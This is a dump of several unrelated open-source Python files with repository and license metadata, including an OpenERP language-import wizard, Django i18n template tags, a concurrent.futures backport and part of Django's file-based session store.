self.assertEquals(alarms[0].dimensions, {u'Job': [u'ANiceCronJob']})
self.assertEquals(alarms[1].name, 'SuperFancyAlarm')
self.assertEquals(alarms[1].comparison, '>')
self.assertEquals(alarms[1].dimensions, {u'Job': [u'ABadCronJob']})
if __name__ == '__main__':
unittest.main()
|
mit
|
luiseduardohdbackup/odoo
|
openerp/addons/base/module/wizard/base_import_language.py
|
337
|
2644
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import base64
from tempfile import TemporaryFile
from openerp import tools
from openerp.osv import osv, fields
class base_language_import(osv.osv_memory):
""" Language Import """
_name = "base.language.import"
_description = "Language Import"
_columns = {
'name': fields.char('Language Name', required=True),
'code': fields.char('ISO Code', size=5, help="ISO Language and Country code, e.g. en_US", required=True),
'data': fields.binary('File', required=True),
'overwrite': fields.boolean('Overwrite Existing Terms',
help="If you enable this option, existing translations (including custom ones) "
"will be overwritten and replaced by those in this file"),
}
def import_lang(self, cr, uid, ids, context=None):
if context is None:
context = {}
this = self.browse(cr, uid, ids[0])
if this.overwrite:
context = dict(context, overwrite=True)
fileobj = TemporaryFile('w+')
try:
fileobj.write(base64.decodestring(this.data))
# now we determine the file format
fileobj.seek(0)
first_line = fileobj.readline().strip().replace('"', '').replace(' ', '')
fileformat = first_line.endswith("type,name,res_id,src,value") and 'csv' or 'po'
fileobj.seek(0)
tools.trans_load_data(cr, fileobj, fileformat, this.code, lang_name=this.name, context=context)
finally:
fileobj.close()
return True
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
ow2-compatibleone/accords-platform
|
pyaccords/amazonEc2Interface.py
|
1
|
2282
|
##############################################################################
#copyright 2012, Hamid MEDJAHED & Elyes ZEKRI ([email protected]) #
# Prologue #
#Licensed under the Apache License, Version 2.0 (the "License"); #
#you may not use this file except in compliance with the License. #
#You may obtain a copy of the License at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
#Unless required by applicable law or agreed to in writing, software #
#distributed under the License is distributed on an "AS IS" BASIS, #
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #
#See the License for the specific language governing permissions and #
#limitations under the License. #
##############################################################################
#!/usr/bin/env python
# -*- coding: latin-1 -*-
# Implementation of category CRUD functions
import sys
import pycompdev
import pypacksrc
srcdirectory=pypacksrc.srcpydir+"/pyaccords/pysrc/"
sys.path.append(srcdirectory)
from amazonEc2Class import *
""" Note: amazonEc2 is a python class to interface the accords category :amazonEc2.
-Attributes of this category are members of this class.
-List of attributes:
- name
- flavor
- image
- original
- profile
- node
- price
- account
- number
- rootpass
- reference
- network
- access
- accessip
- floating
- floatingid
- publicaddr
- privateaddr
- firewall
- group
- zone
- hostname
- workload
- when
- state
"""
def amazonEc2_create(amazonEc2):
"""Implement here your function"""
return amazonEc2
def amazonEc2_retrieve(amazonEc2):
"""Implement here your function"""
return amazonEc2
def amazonEc2_update(amazonEc2):
"""Implement here your function"""
return amazonEc2
def amazonEc2_delete(amazonEc2):
"""Implement here your function"""
return amazonEc2
|
apache-2.0
|
Piasy/proxy-searcher
|
site-packages/django/templatetags/i18n.py
|
80
|
16514
|
from __future__ import with_statement
import re
from django.template import (Node, Variable, TemplateSyntaxError,
TokenParser, Library, TOKEN_TEXT, TOKEN_VAR)
from django.template.base import _render_value_in_context
from django.template.defaulttags import token_kwargs
from django.utils import translation
register = Library()
class GetAvailableLanguagesNode(Node):
def __init__(self, variable):
self.variable = variable
def render(self, context):
from django.conf import settings
context[self.variable] = [(k, translation.ugettext(v)) for k, v in settings.LANGUAGES]
return ''
class GetLanguageInfoNode(Node):
def __init__(self, lang_code, variable):
self.lang_code = Variable(lang_code)
self.variable = variable
def render(self, context):
lang_code = self.lang_code.resolve(context)
context[self.variable] = translation.get_language_info(lang_code)
return ''
class GetLanguageInfoListNode(Node):
def __init__(self, languages, variable):
self.languages = Variable(languages)
self.variable = variable
def get_language_info(self, language):
# ``language`` is either a language code string or a sequence
# with the language code as its first item
if len(language[0]) > 1:
return translation.get_language_info(language[0])
else:
return translation.get_language_info(str(language))
def render(self, context):
langs = self.languages.resolve(context)
context[self.variable] = [self.get_language_info(lang) for lang in langs]
return ''
class GetCurrentLanguageNode(Node):
def __init__(self, variable):
self.variable = variable
def render(self, context):
context[self.variable] = translation.get_language()
return ''
class GetCurrentLanguageBidiNode(Node):
def __init__(self, variable):
self.variable = variable
def render(self, context):
context[self.variable] = translation.get_language_bidi()
return ''
class TranslateNode(Node):
def __init__(self, filter_expression, noop, asvar=None,
message_context=None):
self.noop = noop
self.asvar = asvar
self.message_context = message_context
self.filter_expression = filter_expression
if isinstance(self.filter_expression.var, basestring):
self.filter_expression.var = Variable(u"'%s'" %
self.filter_expression.var)
def render(self, context):
self.filter_expression.var.translate = not self.noop
if self.message_context:
self.filter_expression.var.message_context = (
self.message_context.resolve(context))
output = self.filter_expression.resolve(context)
value = _render_value_in_context(output, context)
if self.asvar:
context[self.asvar] = value
return ''
else:
return value
class BlockTranslateNode(Node):
def __init__(self, extra_context, singular, plural=None, countervar=None,
counter=None, message_context=None):
self.extra_context = extra_context
self.singular = singular
self.plural = plural
self.countervar = countervar
self.counter = counter
self.message_context = message_context
def render_token_list(self, tokens):
result = []
vars = []
for token in tokens:
if token.token_type == TOKEN_TEXT:
result.append(token.contents)
elif token.token_type == TOKEN_VAR:
result.append(u'%%(%s)s' % token.contents)
vars.append(token.contents)
return ''.join(result), vars
def render(self, context):
if self.message_context:
message_context = self.message_context.resolve(context)
else:
message_context = None
tmp_context = {}
for var, val in self.extra_context.items():
tmp_context[var] = val.resolve(context)
# Update() works like a push(), so corresponding context.pop() is at
# the end of function
context.update(tmp_context)
singular, vars = self.render_token_list(self.singular)
# Escape all isolated '%'
singular = re.sub(u'%(?!\()', u'%%', singular)
if self.plural and self.countervar and self.counter:
count = self.counter.resolve(context)
context[self.countervar] = count
plural, plural_vars = self.render_token_list(self.plural)
plural = re.sub(u'%(?!\()', u'%%', plural)
if message_context:
result = translation.npgettext(message_context, singular,
plural, count)
else:
result = translation.ungettext(singular, plural, count)
vars.extend(plural_vars)
else:
if message_context:
result = translation.pgettext(message_context, singular)
else:
result = translation.ugettext(singular)
data = dict([(v, _render_value_in_context(context.get(v, ''), context)) for v in vars])
context.pop()
try:
result = result % data
except KeyError:
with translation.override(None):
result = self.render(context)
return result
class LanguageNode(Node):
def __init__(self, nodelist, language):
self.nodelist = nodelist
self.language = language
def render(self, context):
with translation.override(self.language.resolve(context)):
output = self.nodelist.render(context)
return output
@register.tag("get_available_languages")
def do_get_available_languages(parser, token):
"""
This will store a list of available languages
in the context.
Usage::
{% get_available_languages as languages %}
{% for language in languages %}
...
{% endfor %}
This will just pull the LANGUAGES setting from
your setting file (or the default settings) and
put it into the named variable.
"""
args = token.contents.split()
if len(args) != 3 or args[1] != 'as':
raise TemplateSyntaxError("'get_available_languages' requires 'as variable' (got %r)" % args)
return GetAvailableLanguagesNode(args[2])
@register.tag("get_language_info")
def do_get_language_info(parser, token):
"""
This will store the language information dictionary for the given language
code in a context variable.
Usage::
{% get_language_info for LANGUAGE_CODE as l %}
{{ l.code }}
{{ l.name }}
{{ l.name_local }}
{{ l.bidi|yesno:"bi-directional,uni-directional" }}
"""
args = token.contents.split()
if len(args) != 5 or args[1] != 'for' or args[3] != 'as':
raise TemplateSyntaxError("'%s' requires 'for string as variable' (got %r)" % (args[0], args[1:]))
return GetLanguageInfoNode(args[2], args[4])
@register.tag("get_language_info_list")
def do_get_language_info_list(parser, token):
"""
This will store a list of language information dictionaries for the given
language codes in a context variable. The language codes can be specified
either as a list of strings or a settings.LANGUAGES style tuple (or any
sequence of sequences whose first items are language codes).
Usage::
{% get_language_info_list for LANGUAGES as langs %}
{% for l in langs %}
{{ l.code }}
{{ l.name }}
{{ l.name_local }}
{{ l.bidi|yesno:"bi-directional,uni-directional" }}
{% endfor %}
"""
args = token.contents.split()
if len(args) != 5 or args[1] != 'for' or args[3] != 'as':
raise TemplateSyntaxError("'%s' requires 'for sequence as variable' (got %r)" % (args[0], args[1:]))
return GetLanguageInfoListNode(args[2], args[4])
@register.filter
def language_name(lang_code):
return translation.get_language_info(lang_code)['name']
@register.filter
def language_name_local(lang_code):
return translation.get_language_info(lang_code)['name_local']
@register.filter
def language_bidi(lang_code):
return translation.get_language_info(lang_code)['bidi']
@register.tag("get_current_language")
def do_get_current_language(parser, token):
"""
This will store the current language in the context.
Usage::
{% get_current_language as language %}
This will fetch the currently active language and
put it's value into the ``language`` context
variable.
"""
args = token.contents.split()
if len(args) != 3 or args[1] != 'as':
raise TemplateSyntaxError("'get_current_language' requires 'as variable' (got %r)" % args)
return GetCurrentLanguageNode(args[2])
@register.tag("get_current_language_bidi")
def do_get_current_language_bidi(parser, token):
"""
This will store the current language layout in the context.
Usage::
{% get_current_language_bidi as bidi %}
This will fetch the currently active language's layout and
put it's value into the ``bidi`` context variable.
True indicates right-to-left layout, otherwise left-to-right
"""
args = token.contents.split()
if len(args) != 3 or args[1] != 'as':
raise TemplateSyntaxError("'get_current_language_bidi' requires 'as variable' (got %r)" % args)
return GetCurrentLanguageBidiNode(args[2])
@register.tag("trans")
def do_translate(parser, token):
"""
This will mark a string for translation and will
translate the string for the current language.
Usage::
{% trans "this is a test" %}
This will mark the string for translation so it will
be pulled out by mark-messages.py into the .po files
and will run the string through the translation engine.
There is a second form::
{% trans "this is a test" noop %}
This will only mark for translation, but will return
the string unchanged. Use it when you need to store
values into forms that should be translated later on.
You can use variables instead of constant strings
to translate stuff you marked somewhere else::
{% trans variable %}
This will just try to translate the contents of
the variable ``variable``. Make sure that the string
in there is something that is in the .po file.
It is possible to store the translated string into a variable::
{% trans "this is a test" as var %}
{{ var }}
Contextual translations are also supported::
{% trans "this is a test" context "greeting" %}
This is equivalent to calling pgettext instead of (u)gettext.
"""
class TranslateParser(TokenParser):
def top(self):
value = self.value()
# Backwards Compatiblity fix:
# FilterExpression does not support single-quoted strings,
# so we make a cheap localized fix in order to maintain
# backwards compatibility with existing uses of ``trans``
# where single quote use is supported.
if value[0] == "'":
m = re.match("^'([^']+)'(\|.*$)", value)
if m:
value = '"%s"%s' % (m.group(1).replace('"','\\"'), m.group(2))
elif value[-1] == "'":
value = '"%s"' % value[1:-1].replace('"','\\"')
noop = False
asvar = None
message_context = None
while self.more():
tag = self.tag()
if tag == 'noop':
noop = True
elif tag == 'context':
message_context = parser.compile_filter(self.value())
elif tag == 'as':
asvar = self.tag()
else:
raise TemplateSyntaxError(
"Only options for 'trans' are 'noop', " \
"'context \"xxx\"', and 'as VAR'.")
return value, noop, asvar, message_context
value, noop, asvar, message_context = TranslateParser(token.contents).top()
return TranslateNode(parser.compile_filter(value), noop, asvar,
message_context)
@register.tag("blocktrans")
def do_block_translate(parser, token):
"""
This will translate a block of text with parameters.
Usage::
{% blocktrans with bar=foo|filter boo=baz|filter %}
This is {{ bar }} and {{ boo }}.
{% endblocktrans %}
Additionally, this supports pluralization::
{% blocktrans count count=var|length %}
There is {{ count }} object.
{% plural %}
There are {{ count }} objects.
{% endblocktrans %}
This is much like ngettext, only in template syntax.
The "var as value" legacy format is still supported::
{% blocktrans with foo|filter as bar and baz|filter as boo %}
{% blocktrans count var|length as count %}
Contextual translations are supported::
{% blocktrans with bar=foo|filter context "greeting" %}
This is {{ bar }}.
{% endblocktrans %}
This is equivalent to calling pgettext/npgettext instead of
(u)gettext/(u)ngettext.
"""
bits = token.split_contents()
options = {}
remaining_bits = bits[1:]
while remaining_bits:
option = remaining_bits.pop(0)
if option in options:
raise TemplateSyntaxError('The %r option was specified more '
'than once.' % option)
if option == 'with':
value = token_kwargs(remaining_bits, parser, support_legacy=True)
if not value:
raise TemplateSyntaxError('"with" in %r tag needs at least '
'one keyword argument.' % bits[0])
elif option == 'count':
value = token_kwargs(remaining_bits, parser, support_legacy=True)
if len(value) != 1:
raise TemplateSyntaxError('"count" in %r tag expected exactly '
'one keyword argument.' % bits[0])
elif option == "context":
try:
value = remaining_bits.pop(0)
value = parser.compile_filter(value)
except Exception:
raise TemplateSyntaxError('"context" in %r tag expected '
'exactly one argument.' % bits[0])
else:
raise TemplateSyntaxError('Unknown argument for %r tag: %r.' %
(bits[0], option))
options[option] = value
if 'count' in options:
countervar, counter = options['count'].items()[0]
else:
countervar, counter = None, None
if 'context' in options:
message_context = options['context']
else:
message_context = None
extra_context = options.get('with', {})
singular = []
plural = []
while parser.tokens:
token = parser.next_token()
if token.token_type in (TOKEN_VAR, TOKEN_TEXT):
singular.append(token)
else:
break
if countervar and counter:
if token.contents.strip() != 'plural':
raise TemplateSyntaxError("'blocktrans' doesn't allow other block tags inside it")
while parser.tokens:
token = parser.next_token()
if token.token_type in (TOKEN_VAR, TOKEN_TEXT):
plural.append(token)
else:
break
if token.contents.strip() != 'endblocktrans':
raise TemplateSyntaxError("'blocktrans' doesn't allow other block tags (seen %r) inside it" % token.contents)
return BlockTranslateNode(extra_context, singular, plural, countervar,
counter, message_context)
@register.tag
def language(parser, token):
"""
This will enable the given language just for this block.
Usage::
{% language "de" %}
This is {{ bar }} and {{ boo }}.
{% endlanguage %}
"""
bits = token.split_contents()
if len(bits) != 2:
raise TemplateSyntaxError("'%s' takes one argument (language)" % bits[0])
language = parser.compile_filter(bits[1])
nodelist = parser.parse(('endlanguage',))
parser.delete_first_token()
return LanguageNode(nodelist, language)
|
mit
|
abspoel/YouCompleteMe
|
third_party/pythonfutures/concurrent/futures/_base.py
|
89
|
19642
|
# Copyright 2009 Brian Quinlan. All Rights Reserved.
# Licensed to PSF under a Contributor Agreement.
from __future__ import with_statement
import logging
import threading
import time
try:
from collections import namedtuple
except ImportError:
from concurrent.futures._compat import namedtuple
__author__ = 'Brian Quinlan ([email protected])'
FIRST_COMPLETED = 'FIRST_COMPLETED'
FIRST_EXCEPTION = 'FIRST_EXCEPTION'
ALL_COMPLETED = 'ALL_COMPLETED'
_AS_COMPLETED = '_AS_COMPLETED'
# Possible future states (for internal use by the futures package).
PENDING = 'PENDING'
RUNNING = 'RUNNING'
# The future was cancelled by the user...
CANCELLED = 'CANCELLED'
# ...and _Waiter.add_cancelled() was called by a worker.
CANCELLED_AND_NOTIFIED = 'CANCELLED_AND_NOTIFIED'
FINISHED = 'FINISHED'
_FUTURE_STATES = [
PENDING,
RUNNING,
CANCELLED,
CANCELLED_AND_NOTIFIED,
FINISHED
]
_STATE_TO_DESCRIPTION_MAP = {
PENDING: "pending",
RUNNING: "running",
CANCELLED: "cancelled",
CANCELLED_AND_NOTIFIED: "cancelled",
FINISHED: "finished"
}
# Logger for internal use by the futures package.
LOGGER = logging.getLogger("concurrent.futures")
class Error(Exception):
"""Base class for all future-related exceptions."""
pass
class CancelledError(Error):
"""The Future was cancelled."""
pass
class TimeoutError(Error):
"""The operation exceeded the given deadline."""
pass
class _Waiter(object):
"""Provides the event that wait() and as_completed() block on."""
def __init__(self):
self.event = threading.Event()
self.finished_futures = []
def add_result(self, future):
self.finished_futures.append(future)
def add_exception(self, future):
self.finished_futures.append(future)
def add_cancelled(self, future):
self.finished_futures.append(future)
class _AsCompletedWaiter(_Waiter):
"""Used by as_completed()."""
def __init__(self):
super(_AsCompletedWaiter, self).__init__()
self.lock = threading.Lock()
def add_result(self, future):
with self.lock:
super(_AsCompletedWaiter, self).add_result(future)
self.event.set()
def add_exception(self, future):
with self.lock:
super(_AsCompletedWaiter, self).add_exception(future)
self.event.set()
def add_cancelled(self, future):
with self.lock:
super(_AsCompletedWaiter, self).add_cancelled(future)
self.event.set()
class _FirstCompletedWaiter(_Waiter):
"""Used by wait(return_when=FIRST_COMPLETED)."""
def add_result(self, future):
super(_FirstCompletedWaiter, self).add_result(future)
self.event.set()
def add_exception(self, future):
super(_FirstCompletedWaiter, self).add_exception(future)
self.event.set()
def add_cancelled(self, future):
super(_FirstCompletedWaiter, self).add_cancelled(future)
self.event.set()
class _AllCompletedWaiter(_Waiter):
"""Used by wait(return_when=FIRST_EXCEPTION and ALL_COMPLETED)."""
def __init__(self, num_pending_calls, stop_on_exception):
self.num_pending_calls = num_pending_calls
self.stop_on_exception = stop_on_exception
self.lock = threading.Lock()
super(_AllCompletedWaiter, self).__init__()
def _decrement_pending_calls(self):
with self.lock:
self.num_pending_calls -= 1
if not self.num_pending_calls:
self.event.set()
def add_result(self, future):
super(_AllCompletedWaiter, self).add_result(future)
self._decrement_pending_calls()
def add_exception(self, future):
super(_AllCompletedWaiter, self).add_exception(future)
if self.stop_on_exception:
self.event.set()
else:
self._decrement_pending_calls()
def add_cancelled(self, future):
super(_AllCompletedWaiter, self).add_cancelled(future)
self._decrement_pending_calls()
class _AcquireFutures(object):
"""A context manager that does an ordered acquire of Future conditions."""
def __init__(self, futures):
self.futures = sorted(futures, key=id)
def __enter__(self):
for future in self.futures:
future._condition.acquire()
def __exit__(self, *args):
for future in self.futures:
future._condition.release()
def _create_and_install_waiters(fs, return_when):
if return_when == _AS_COMPLETED:
waiter = _AsCompletedWaiter()
elif return_when == FIRST_COMPLETED:
waiter = _FirstCompletedWaiter()
else:
pending_count = sum(
f._state not in [CANCELLED_AND_NOTIFIED, FINISHED] for f in fs)
if return_when == FIRST_EXCEPTION:
waiter = _AllCompletedWaiter(pending_count, stop_on_exception=True)
elif return_when == ALL_COMPLETED:
waiter = _AllCompletedWaiter(pending_count, stop_on_exception=False)
else:
raise ValueError("Invalid return condition: %r" % return_when)
for f in fs:
f._waiters.append(waiter)
return waiter
def as_completed(fs, timeout=None):
"""An iterator over the given futures that yields each as it completes.
Args:
fs: The sequence of Futures (possibly created by different Executors) to
iterate over.
timeout: The maximum number of seconds to wait. If None, then there
is no limit on the wait time.
Returns:
An iterator that yields the given Futures as they complete (finished or
cancelled).
Raises:
TimeoutError: If the entire result iterator could not be generated
before the given timeout.
"""
if timeout is not None:
end_time = timeout + time.time()
with _AcquireFutures(fs):
finished = set(
f for f in fs
if f._state in [CANCELLED_AND_NOTIFIED, FINISHED])
pending = set(fs) - finished
waiter = _create_and_install_waiters(fs, _AS_COMPLETED)
try:
for future in finished:
yield future
while pending:
if timeout is None:
wait_timeout = None
else:
wait_timeout = end_time - time.time()
if wait_timeout < 0:
raise TimeoutError(
'%d (of %d) futures unfinished' % (
len(pending), len(fs)))
waiter.event.wait(wait_timeout)
with waiter.lock:
finished = waiter.finished_futures
waiter.finished_futures = []
waiter.event.clear()
for future in finished:
yield future
pending.remove(future)
finally:
for f in fs:
f._waiters.remove(waiter)
DoneAndNotDoneFutures = namedtuple(
'DoneAndNotDoneFutures', 'done not_done')
def wait(fs, timeout=None, return_when=ALL_COMPLETED):
"""Wait for the futures in the given sequence to complete.
Args:
fs: The sequence of Futures (possibly created by different Executors) to
wait upon.
timeout: The maximum number of seconds to wait. If None, then there
is no limit on the wait time.
return_when: Indicates when this function should return. The options
are:
FIRST_COMPLETED - Return when any future finishes or is
cancelled.
FIRST_EXCEPTION - Return when any future finishes by raising an
exception. If no future raises an exception
then it is equivalent to ALL_COMPLETED.
ALL_COMPLETED - Return when all futures finish or are cancelled.
Returns:
A named 2-tuple of sets. The first set, named 'done', contains the
futures that completed (is finished or cancelled) before the wait
completed. The second set, named 'not_done', contains uncompleted
futures.
"""
with _AcquireFutures(fs):
done = set(f for f in fs
if f._state in [CANCELLED_AND_NOTIFIED, FINISHED])
not_done = set(fs) - done
if (return_when == FIRST_COMPLETED) and done:
return DoneAndNotDoneFutures(done, not_done)
elif (return_when == FIRST_EXCEPTION) and done:
if any(f for f in done
if not f.cancelled() and f.exception() is not None):
return DoneAndNotDoneFutures(done, not_done)
if len(done) == len(fs):
return DoneAndNotDoneFutures(done, not_done)
waiter = _create_and_install_waiters(fs, return_when)
waiter.event.wait(timeout)
for f in fs:
f._waiters.remove(waiter)
done.update(waiter.finished_futures)
return DoneAndNotDoneFutures(done, set(fs) - done)
class Future(object):
"""Represents the result of an asynchronous computation."""
def __init__(self):
"""Initializes the future. Should not be called by clients."""
self._condition = threading.Condition()
self._state = PENDING
self._result = None
self._exception = None
self._waiters = []
self._done_callbacks = []
def _invoke_callbacks(self):
for callback in self._done_callbacks:
try:
callback(self)
except Exception:
LOGGER.exception('exception calling callback for %r', self)
def __repr__(self):
with self._condition:
if self._state == FINISHED:
if self._exception:
return '<Future at %s state=%s raised %s>' % (
hex(id(self)),
_STATE_TO_DESCRIPTION_MAP[self._state],
self._exception.__class__.__name__)
else:
return '<Future at %s state=%s returned %s>' % (
hex(id(self)),
_STATE_TO_DESCRIPTION_MAP[self._state],
self._result.__class__.__name__)
return '<Future at %s state=%s>' % (
hex(id(self)),
_STATE_TO_DESCRIPTION_MAP[self._state])
def cancel(self):
"""Cancel the future if possible.
Returns True if the future was cancelled, False otherwise. A future
cannot be cancelled if it is running or has already completed.
"""
with self._condition:
if self._state in [RUNNING, FINISHED]:
return False
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
return True
self._state = CANCELLED
self._condition.notify_all()
self._invoke_callbacks()
return True
def cancelled(self):
"""Return True if the future has cancelled."""
with self._condition:
return self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]
def running(self):
"""Return True if the future is currently executing."""
with self._condition:
return self._state == RUNNING
def done(self):
"""Return True of the future was cancelled or finished executing."""
with self._condition:
return self._state in [CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED]
def __get_result(self):
if self._exception:
raise self._exception
else:
return self._result
def add_done_callback(self, fn):
"""Attaches a callable that will be called when the future finishes.
Args:
fn: A callable that will be called with this future as its only
argument when the future completes or is cancelled. The callable
will always be called by a thread in the same process in which
it was added. If the future has already completed or been
cancelled then the callable will be called immediately. These
callables are called in the order that they were added.
"""
with self._condition:
if self._state not in [CANCELLED, CANCELLED_AND_NOTIFIED, FINISHED]:
self._done_callbacks.append(fn)
return
fn(self)
def result(self, timeout=None):
"""Return the result of the call that the future represents.
Args:
timeout: The number of seconds to wait for the result if the future
isn't done. If None, then there is no limit on the wait time.
Returns:
The result of the call that the future represents.
Raises:
CancelledError: If the future was cancelled.
TimeoutError: If the future didn't finish executing before the given
timeout.
Exception: If the call raised then that exception will be raised.
"""
with self._condition:
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
raise CancelledError()
elif self._state == FINISHED:
return self.__get_result()
self._condition.wait(timeout)
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
raise CancelledError()
elif self._state == FINISHED:
return self.__get_result()
else:
raise TimeoutError()
def exception(self, timeout=None):
"""Return the exception raised by the call that the future represents.
Args:
timeout: The number of seconds to wait for the exception if the
future isn't done. If None, then there is no limit on the wait
time.
Returns:
The exception raised by the call that the future represents or None
if the call completed without raising.
Raises:
CancelledError: If the future was cancelled.
TimeoutError: If the future didn't finish executing before the given
timeout.
"""
with self._condition:
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
raise CancelledError()
elif self._state == FINISHED:
return self._exception
self._condition.wait(timeout)
if self._state in [CANCELLED, CANCELLED_AND_NOTIFIED]:
raise CancelledError()
elif self._state == FINISHED:
return self._exception
else:
raise TimeoutError()
# The following methods should only be used by Executors and in tests.
def set_running_or_notify_cancel(self):
"""Mark the future as running or process any cancel notifications.
Should only be used by Executor implementations and unit tests.
If the future has been cancelled (cancel() was called and returned
True) then any threads waiting on the future completing (though calls
to as_completed() or wait()) are notified and False is returned.
If the future was not cancelled then it is put in the running state
(future calls to running() will return True) and True is returned.
This method should be called by Executor implementations before
executing the work associated with this future. If this method returns
False then the work should not be executed.
Returns:
False if the Future was cancelled, True otherwise.
Raises:
RuntimeError: if this method was already called or if set_result()
or set_exception() was called.
"""
with self._condition:
if self._state == CANCELLED:
self._state = CANCELLED_AND_NOTIFIED
for waiter in self._waiters:
waiter.add_cancelled(self)
# self._condition.notify_all() is not necessary because
# self.cancel() triggers a notification.
return False
elif self._state == PENDING:
self._state = RUNNING
return True
else:
LOGGER.critical('Future %s in unexpected state: %s',
id(self.future),
self.future._state)
raise RuntimeError('Future in unexpected state')
def set_result(self, result):
"""Sets the return value of work associated with the future.
Should only be used by Executor implementations and unit tests.
"""
with self._condition:
self._result = result
self._state = FINISHED
for waiter in self._waiters:
waiter.add_result(self)
self._condition.notify_all()
self._invoke_callbacks()
def set_exception(self, exception):
"""Sets the result of the future as being the given exception.
Should only be used by Executor implementations and unit tests.
"""
with self._condition:
self._exception = exception
self._state = FINISHED
for waiter in self._waiters:
waiter.add_exception(self)
self._condition.notify_all()
self._invoke_callbacks()
class Executor(object):
"""This is an abstract base class for concrete asynchronous executors."""
def submit(self, fn, *args, **kwargs):
"""Submits a callable to be executed with the given arguments.
Schedules the callable to be executed as fn(*args, **kwargs) and returns
a Future instance representing the execution of the callable.
Returns:
A Future representing the given call.
"""
raise NotImplementedError()
def map(self, fn, *iterables, **kwargs):
"""Returns a iterator equivalent to map(fn, iter).
Args:
fn: A callable that will take as many arguments as there are
passed iterables.
timeout: The maximum number of seconds to wait. If None, then there
is no limit on the wait time.
Returns:
An iterator equivalent to: map(func, *iterables) but the calls may
be evaluated out-of-order.
Raises:
TimeoutError: If the entire result iterator could not be generated
before the given timeout.
Exception: If fn(*args) raises for any values.
"""
timeout = kwargs.get('timeout')
if timeout is not None:
end_time = timeout + time.time()
fs = [self.submit(fn, *args) for args in zip(*iterables)]
try:
for future in fs:
if timeout is None:
yield future.result()
else:
yield future.result(end_time - time.time())
finally:
for future in fs:
future.cancel()
def shutdown(self, wait=True):
"""Clean-up the resources associated with the Executor.
It is safe to call this method several times. Otherwise, no other
methods can be called after this one.
Args:
wait: If True then shutdown will not return until all running
futures have finished executing and the resources used by the
executor have been reclaimed.
"""
pass
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown(wait=True)
return False
|
gpl-3.0
|
jarvys/django-1.7-jdb
|
django/contrib/sessions/backends/file.py
|
113
|
7663
|
import datetime
import errno
import logging
import os
import shutil
import tempfile
from django.conf import settings
from django.contrib.sessions.backends.base import SessionBase, CreateError, VALID_KEY_CHARS
from django.core.exceptions import SuspiciousOperation, ImproperlyConfigured
from django.utils import timezone
from django.utils.encoding import force_text
from django.contrib.sessions.exceptions import InvalidSessionKey
class SessionStore(SessionBase):
"""
Implements a file based session store.
"""
def __init__(self, session_key=None):
self.storage_path = type(self)._get_storage_path()
self.file_prefix = settings.SESSION_COOKIE_NAME
super(SessionStore, self).__init__(session_key)
@classmethod
def _get_storage_path(cls):
try:
return cls._storage_path
except AttributeError:
storage_path = getattr(settings, "SESSION_FILE_PATH", None)
if not storage_path:
storage_path = tempfile.gettempdir()
# Make sure the storage path is valid.
if not os.path.isdir(storage_path):
raise ImproperlyConfigured(
"The session storage path %r doesn't exist. Please set your"
" SESSION_FILE_PATH setting to an existing directory in which"
" Django can store session data." % storage_path)
cls._storage_path = storage_path
return storage_path
def _key_to_file(self, session_key=None):
"""
Get the file associated with this session key.
"""
if session_key is None:
session_key = self._get_or_create_session_key()
# Make sure we're not vulnerable to directory traversal. Session keys
# should always be md5s, so they should never contain directory
# components.
if not set(session_key).issubset(set(VALID_KEY_CHARS)):
raise InvalidSessionKey(
"Invalid characters in session key")
return os.path.join(self.storage_path, self.file_prefix + session_key)
def _last_modification(self):
"""
Return the modification time of the file storing the session's content.
"""
modification = os.stat(self._key_to_file()).st_mtime
if settings.USE_TZ:
modification = datetime.datetime.utcfromtimestamp(modification)
modification = modification.replace(tzinfo=timezone.utc)
else:
modification = datetime.datetime.fromtimestamp(modification)
return modification
def load(self):
session_data = {}
try:
with open(self._key_to_file(), "rb") as session_file:
file_data = session_file.read()
# Don't fail if there is no data in the session file.
# We may have opened the empty placeholder file.
if file_data:
try:
session_data = self.decode(file_data)
except (EOFError, SuspiciousOperation) as e:
if isinstance(e, SuspiciousOperation):
logger = logging.getLogger('django.security.%s' %
e.__class__.__name__)
logger.warning(force_text(e))
self.create()
# Remove expired sessions.
expiry_age = self.get_expiry_age(
modification=self._last_modification(),
expiry=session_data.get('_session_expiry'))
if expiry_age < 0:
session_data = {}
self.delete()
self.create()
except (IOError, SuspiciousOperation):
self.create()
return session_data
def create(self):
while True:
self._session_key = self._get_new_session_key()
try:
self.save(must_create=True)
except CreateError:
continue
self.modified = True
self._session_cache = {}
return
def save(self, must_create=False):
# Get the session data now, before we start messing
# with the file it is stored within.
session_data = self._get_session(no_load=must_create)
session_file_name = self._key_to_file()
try:
# Make sure the file exists. If it does not already exist, an
# empty placeholder file is created.
flags = os.O_WRONLY | os.O_CREAT | getattr(os, 'O_BINARY', 0)
if must_create:
flags |= os.O_EXCL
fd = os.open(session_file_name, flags)
os.close(fd)
except OSError as e:
if must_create and e.errno == errno.EEXIST:
raise CreateError
raise
# Write the session file without interfering with other threads
# or processes. By writing to an atomically generated temporary
# file and then using the atomic os.rename() to make the complete
# file visible, we avoid having to lock the session file, while
# still maintaining its integrity.
#
# Note: Locking the session file was explored, but rejected in part
# because in order to be atomic and cross-platform, it required a
# long-lived lock file for each session, doubling the number of
# files in the session storage directory at any given time. This
# rename solution is cleaner and avoids any additional overhead
# when reading the session data, which is the more common case
# unless SESSION_SAVE_EVERY_REQUEST = True.
#
# See ticket #8616.
